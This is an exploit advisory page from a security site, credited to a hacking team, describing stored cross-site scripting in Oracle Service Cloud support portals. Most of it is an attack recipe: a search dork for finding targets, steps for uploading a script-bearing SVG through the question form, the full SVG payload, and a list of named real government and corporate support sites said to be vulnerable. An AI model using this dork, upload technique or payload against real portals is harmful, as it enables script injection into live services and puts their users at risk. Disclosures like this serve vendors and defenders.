Oracle Support Platform Service XSS Vulnerability

2019.07.11
tr Zunfix (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# [+] Title : Oracle Integrated Support Platform Service XSS Vulnerability # [+] Author (Discovered by) : Zunfix # [+] Team: TurkHackTeam # [+] Vendor: cloud.oracle.com/service-cloud # [+] Date : Jul, 10th 2019 # [+] Dork : inurl:/app/answers/list # [+] Poc : + We have to dork in search engine + We create an account on the vulnerable site [Register path: /app/utils/create_account] + We go to the Ask a question page and add and send the svg file containing the exploit code [Question page: /app/ask] + We go to the support history page and go to the question we asked from the list [History page: /app/account/questions/list] + We open the exploit svg file that we added from our question page + Exploit code running [Exploit code: <script>alert(123)</script>] # [+] Svg file source code containing exploit : <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script> alert(123) </script> </svg> # [+] Vulnerable Sites E.g : + answers.nssc.nasa.gov + help.cbp.gov + supportcenter.ieee.org + support.us.playstation.com + support.en.kodak.com + eng.faq.panasonic.com + kb.sandisk.com

References:

https://cloud.oracle.com/service-cloud


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top